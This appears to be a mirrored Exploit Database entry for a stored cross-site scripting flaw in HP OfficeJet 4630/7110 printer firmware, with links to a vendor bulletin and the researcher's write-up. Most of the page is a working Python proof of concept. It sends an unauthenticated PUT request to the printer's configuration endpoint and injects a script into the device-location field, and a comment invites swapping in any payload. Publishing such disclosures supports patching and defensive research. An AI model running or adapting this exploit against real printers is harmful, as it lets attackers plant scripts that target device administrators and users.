HP OfficeJet 4630/7110 MYM1FN2025AR/2117A – Stored Cross-Site Scripting (XSS)

• Exploit Database
• 12 阅读

• 作者： Tyler Butler
  日期： 2021-08-25
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50227/

• # Exploit Title: HP OfficeJet 4630/7110 MYM1FN2025AR 2117A – Stored Cross-Site Scripting (XSS)
  # Date: 01/08/2021
  # Exploit Author: Tyler Butler
  # Vendor Homepage: https://www8.hp.com/
  # Vendor Bulletin: https://support.hp.com/ie-en/document/ish_4433829-4433857-16/hpsbpi03742
  # Researcher Bulletin: https://tbutler.org/2021/04/29/hp-officejet-4630
  # Version: HP OfficeJet 7110 Wide Format ePrinter
  # Tested on: HP Officejet 4630 e-All-in-One Printer series model number B4L03A
  
  # PoC:
  import requests
  import json
  from requests.exceptions import HTTPError
  
  target = 'http://192.168.223.1' # The IP of the vulnerable taget 
  payload = '''<script>alert('XSS');</script>'''# The XSS injection payload you want to use 
  path='/DevMgmt/ProductConfigDyn.xml' # Path location of the PUT command
  pre = '''
  <?xml version="1.0" encoding="UTF-8"?>
  <!-- THIS DATA SUBJECT TO DISCLAIMER(S) INCLUDED WITH THE PRODUCT OF ORIGIN. -->
  <prdcfgdyn2:ProductConfigDyn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/" xmlns:prdcfgdyn2="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16" xmlns:prdcfgdyn="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05" xsi:schemaLocation="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16 ../schemas/ledm2/ProductConfigDyn.xsd http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05 ../schemas/ProductConfigDyn.xsd http://www.hp.com/schemas/imaging/con/dictionaries/1.0/ ../schemas/dd/DataDictionaryMasterLEDM.xsd">
  	<prdcfgdyn2:ProductSettings>
  		<prdcfgdyn:DeviceInformation>
  			<dd:DeviceLocation>
  '''# The start of the request body
  post = '''
  </dd:DeviceLocation>
  		</prdcfgdyn:DeviceInformation>
  	</prdcfgdyn2:ProductSettings>	
  </prdcfgdyn2:ProductConfigDyn>
  ''' # The end of the request body 
  body = pre + payload + post
  
  
  headers = {
  'Host':'192.168.223.1', 
  'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0',
  'Accept':'*/*',
  'Accept-Language':'en-US,en;q=0.5',
  'Accept-Encoding':'gzip, deflate',
  'Content-Type':'text/xml',
  'Content-Length':str(len(body.encode('utf-8'))),
  'Origin':'https://192.168.223.1',
  'Connection':'close',
  'Referer':target,
  }
  
  print('{!} Starting HP Officejet 4630 XSS Injector .... \nAuthor: Tyler Butler\n@tbutler0x90')
  try:
  print('{!} Injecting payload :',payload)
  response = requests.put(target+path, headers = headers, data = body)
  response.raise_for_status()
  except HTTPError as http_err:
  print('{X}',f'HTTP error occurred: {http_err}') 
  except Exception as err:
  print('{X}',f'Other error occurred: {err}')
  else:
  print('{!} Success!')